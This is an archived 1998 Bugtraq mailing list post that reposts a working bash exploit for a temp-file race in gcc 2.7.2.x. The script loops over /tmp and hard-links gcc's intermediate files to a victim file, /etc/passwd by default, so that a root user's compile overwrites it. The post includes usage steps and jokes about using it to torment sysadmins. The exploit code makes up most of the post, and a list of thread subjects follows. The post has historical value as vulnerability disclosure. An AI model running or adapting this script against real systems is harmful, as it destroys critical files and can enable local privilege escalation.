Bugtraq mailing list archives
GCC Exploit
From: prj () raex com (Phillip R. Jaenke)
Date: Sun, 18 Jan 1998 01:27:51 -0500
Sorry if this has already been mentioned, but it's an updated version anyways. NOT fun. NOT good. Unless you wanna drive a sysadmin nuts. ;P --begin gcc-exploit-2-- Try this. Launch it as a unprivledged user in background (screen?), then, as a root, try to compile any file or project using gcc (eg. typical daemon, service, client), and watch out your /etc/passwd (or any other vital file, eg. /dev/kmem, /dev/hda). Attached exploit is an improved version of that one I previously posted onto BUGTRAQ (yesterday). It's also possible to overwrite other user's files (if only he/she uses gcc occassionally), system logs etc. Vunerable platforms: any running gcc 2.7.2.x Compromise: overwriting files, maybe root; exploitable locally. -- cut here -- #!/bin/bash # [ http://www.rootshell.com ] 1/16/98 # Simple GCC exploit (tested under 2.7.2.3.f.1) # - by Michal Zalewski (lcamtuf () staszic waw pl) # --------------------------------------------- # Usage: "screen ./gcc_ln" then Ctrl+A,D # --------------------------------------------- # Ugh, blah... Should be written in C for # better performance, but I have no time :) VICTIM=/etc/passwd if [ ! -f $VICTIM ]; then echo "I can't see my victim ($VICTIM)..." exit 0 fi ORIG=`ls -l $VICTIM|awk '{print \$5}'` echo "GCC exploit launched against $VICTIM ($ORIG bytes)." renice +20 $PPID >&/dev/null cd /tmp while [ 1 ]; do V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."` if [ ! "$V" = "" ]; then ln $VICTIM ${V}.s &>/dev/null ln $VICTIM ${V}1.o &>/dev/null NOWY=`ls -l $VICTIM|awk '{print \$5}'` if [ "$ORIG" = "$NOWY" ]; then echo -n "." rm -f ${V}.s ${V}1.o &>/dev/null else echo "Voila. I'm so smart." rm -f ${V}.s ${V}1.o &>/dev/null exit 0 fi fi done --end gcc-exploit-2-- --Phillip R. Jaenke (prj () raex com) Primary Developer, The Improvement Linux Project Core Team Member, The Cyberian RC5 Effort - http://www.cyberian.org/ AKA Kaeyerai (Rediscovery) of MasterTechnoMonster Maintainer, The Cleveland Modem Guide - http://web.raex.com/~prj/
Current thread:
- Java reboots win95 Joe Lindstr?m (Jan 17)
- Re: Java reboots win95 David LeBlanc (Jan 17)
- GCC Exploit Phillip R. Jaenke (Jan 17)
- Security Problem in MH 6.8.4 Cesar Tascon Alvarez (Jan 19)
- Re: Security Problem in MH 6.8.4 mparson () SMARTNAP COM (Jan 19)
- Re: Security Problem in MH 6.8.4 Philip Guenther (Jan 20)
- Re: Security Problem in MH 6.8.4 Cy Schubert - ITSD Open Systems Group (Jan 20)
- Re: Security Problem in MH 6.8.4 Alan Cox (Jan 20)
- L0pht Security Advisory mattw (Jan 20)
- Re: Security Problem in MH 6.8.4 mparson () SMARTNAP COM (Jan 19)